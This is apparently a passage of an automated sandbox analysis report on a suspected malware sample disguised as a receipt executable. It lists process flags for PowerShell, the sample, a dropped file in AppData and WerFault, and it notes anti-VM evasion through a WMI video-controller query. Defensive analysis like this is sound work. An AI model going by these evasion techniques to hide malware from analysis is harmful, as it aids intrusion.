            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\XetHVID.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: Receipt-#202431029B.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: XetHVID.exe PID: 8064, type: MEMORYSTR
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
